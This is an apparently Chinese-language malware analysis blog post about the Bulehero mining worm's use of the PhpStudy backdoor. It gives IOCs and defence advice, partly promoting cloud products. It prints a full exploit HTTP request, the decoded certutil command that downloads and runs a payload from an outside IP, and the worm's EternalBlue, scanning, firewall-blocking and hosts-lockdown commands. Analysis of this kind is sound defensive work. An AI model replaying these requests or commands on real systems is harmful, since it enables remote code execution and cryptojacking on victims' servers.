概述

近日，阿里云安全團隊監控到Bulehero挖礦蠕蟲進行了版本升級，蠕蟲升級后開始利用最新出現的PHPStudy后門漏洞作為新的攻擊方式對Windows主機進行攻擊，攻擊成功后會下載門羅幣挖礦程序進行牟利。該挖礦程序會大肆搶占服務器CPU資源進行門羅幣的挖掘，造成服務器卡頓，嚴重影響正常業務運行，甚至造成業務終端。關于該蠕蟲最早曝光于2018年7月，蠕蟲自出現后頻繁更新，陸續加入多達數十種的的攻擊方式，可以預計該黑客團伙將會不斷的尋找新的攻擊方式來植入其惡意程序。建議用戶及時排查自身主機是否存在安全漏洞，并關注阿里云安全團隊的相關文章。

背景介紹

Bulehero

Bulehero挖礦蠕蟲最早出現于2018年初，初次曝光于2018年8月，因最早使用bulehero.in域名被命名為Bulehero。該蠕蟲專注于攻擊Windows服務器，通過植入惡意挖礦軟件進行牟利。它使用多種復雜的攻擊方式進行傳播，自出現后更新頻繁，不斷的將新的攻擊方式加入自己的武器庫。

PhpStudy后門漏洞

PhpStudy是國內的一款免費的PHP調試環境的程序集成包，在國內有著近百萬的PHP語言學習者和開發者用戶。在2019年9月20日，網上爆出PhpStudy存在“后門”：黑客早在2016年就編寫了“后門”文件，并非法侵入了PhpStudy的官網，篡改了軟件安裝包植入“后門”。該“后門”具有遠程控制計算機的功能，可以遠程控制下載運行腳本實現用戶個人信息收集。據報道黑客利用該漏洞共非法控制計算機67萬余臺，非法獲取大量賬號密碼類、聊天數據類、設備碼類等數據10萬余組。該“后門”除了會造成挖礦和信息泄露，還有可能被勒索病毒利用，服務器關鍵數據被勒索病毒加密后將無法找回，給被害者造成大量的數據、經濟損失。

蠕蟲分析

攻擊行為分析

攻擊者會向被攻擊的服務器發送一個利用漏洞的HTTP GET請求，惡意代碼存在于請求頭的Accept-Charset字段，字段內容經過base64編碼。解碼后可以發現這是一段windows命令：利用certutil.exe工具下載download.exe

GET /index.php HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Charset: c3lzdGVtKCdjZXJ0dXRpbC5leGUgLXVybGNhY2hlIC1zcGxpdCAtZiBodHRwOi8vNjAuMTY0LjI1MC4xNzA6Mzg4OC9kb3dubG9hZC5leGUgJVN5c3RlbVJvb3QlL1RlbXAvZ2Jubm5teXdrdmd3aGZxMTM5OTAuZXhlICYgJVN5c3RlbVJvb3QlL1RlbXAvZ2Jubm5teXdrdmd3aGZxMTM5OTAuZXhlJyk7ZWNobyBtZDUoJ3BocHN0dWR5Jyk7
Accept-Encoding: gzip,deflate
Accept-Language: zh-cn
Referer: http://xxx:80/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: xxx

解碼后內容：

system('certutil.exe -urlcache -split -f http://60.164.250.170:3888/download.exe %SystemRoot%/Temp/gbnnnmywkvgwhfq13990.exe & %SystemRoot%/Temp/gbnnnmywkvgwhfq13990.exe');echo md5('phpstudy');

被感染主機行為

如上圖是惡意文件在主機中的行為流程圖，download.exe是Bulehero的下載器，會下載名為ScarupnpLogon.exe 的文件。該文件會釋放多個打包的惡意文件，這些惡意文件可分為三個模塊：挖礦模塊、掃描模塊、攻擊模塊。

• 挖礦模塊：該模塊進行門羅幣的挖礦，Bulehero在該版本中并未使用公共礦池進行挖礦，改用自建的礦池代理進行挖礦任務分發，因此可以避免暴露錢包地址，防止安全研究人員的跟蹤。

• 掃描模塊：該模塊會掃描互聯網的特定開放端口，并將掃描結果寫入到名為Result.txt的文件中

C:\Windows\gstmlepnk\ntkpmzgif\uktkebigm.exe -iL C:\Windows\gstmlepnk\ntkpmzgif\ip.txt -oJ C:\Windows\gstmlepnk\ntkpmzgif\Result.txt --open --rate 4096 -p 445

• 攻擊模塊： 該模塊集成多種漏洞利用工具，讀取掃描結果并攻擊其他主機，如下進程是其使用永恒之藍漏洞模塊進行攻擊。

C:\Windows\gstmlepnk\UnattendGC\specials\svschost.exe --InConfig C:\Windows\gstmlepnk\UnattendGC\specials\svschost.xml --TargetIp 106.14.149.128 --TargetPort 445 --DllPayload C:\Windows\gstmlepnk\UnattendGC\AppCapture64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll

我們對比Bulehero升級前的樣本行為，發現它在主機中的行為并未有較大改變，依然是通過download.exe下載器下載文件包，并釋放三個功能模塊。但是它為了隱藏自身改變了惡意文件命名方式，升級前通過混淆的系統文件名進行偽裝，升級后全部為隨機的文件路徑和文件名。雖然隨機文件名相對于混淆系統文件名更容易暴露自己，但這種策略的好處是可以避免被其他挖礦病毒通過進程指紋清除，在資源競爭中占據優勢。

• 其他行為 使用netsh ipsec安全工具，阻斷存在漏洞的服務端口，防止其他競爭者進入。

netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
netsh ipsec static add filteraction name=BastardsList action=block

修改主機host防止其他競爭者劫持域名。

cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM

時間線

我們根據Bulehero的惡意文件編譯時間和文件上傳時間，可以確定Bulehero的升級時間是在10月6號的23點，距離PhpStudy后門漏洞利用方式曝光只有2周。如果企業存在漏洞，去除中間的國慶長假，真正留給企業的修復之間只有幾天。從惡意文件下載次數來看，截止到發稿前已經有1萬5千次的下載，可見該蠕蟲傳播速度極快，造成的破壞性很大。

其他攻擊方式

除了此次更新增加的PhpStudy后門漏洞，Bulehero還使用多種攻擊方式，如下是其他已知的攻擊方式。

IOCs

60[.]164[.]250[.]170 185[.]147[.]34[.]136 fky[.]dfg45dfg45[.]best uu[.]dfg45dfg45[.]best uu1[.]dfg45dfg45[.]best ox[.]mygoodluck[.]best oo[.]mygoodluck[.]best

安全建議

1. 企業需要對涉及的漏洞及時修復，否則容易成為挖礦木馬的受害者。

2. 建議使用阿里云安全的下一代云防火墻產品，其阻斷惡意外聯、能夠配置智能策略的功能，能夠有效幫助防御入侵。哪怕攻擊者在主機上的隱藏手段再高明，下載、挖礦、反彈shell這些操作，都需要進行惡意外聯；云防火墻的攔截將徹底阻斷攻擊鏈。此外，用戶還可以通過自定義策略，直接屏蔽惡意網站，達到阻斷入侵的目的。此外，云防火墻獨有的虛擬補丁功能，能夠幫助客戶更靈活、更“無感”地阻斷攻擊。

3. 對于有更高定制化要求的用戶，可以考慮使用阿里云安全管家服務。購買服務后將有經驗豐富的安全專家提供咨詢服務，定制適合您的方案，幫助加固系統，預防入侵。入侵事件發生后，也可介入直接協助入侵后的清理、事件溯源等，適合有較高安全需求的用戶，或未雇傭安全工程師，但希望保障系統安全的企業。

本文作者：桑鐸

原文鏈接

本文為云棲社區原創內容，未經允許不得轉載。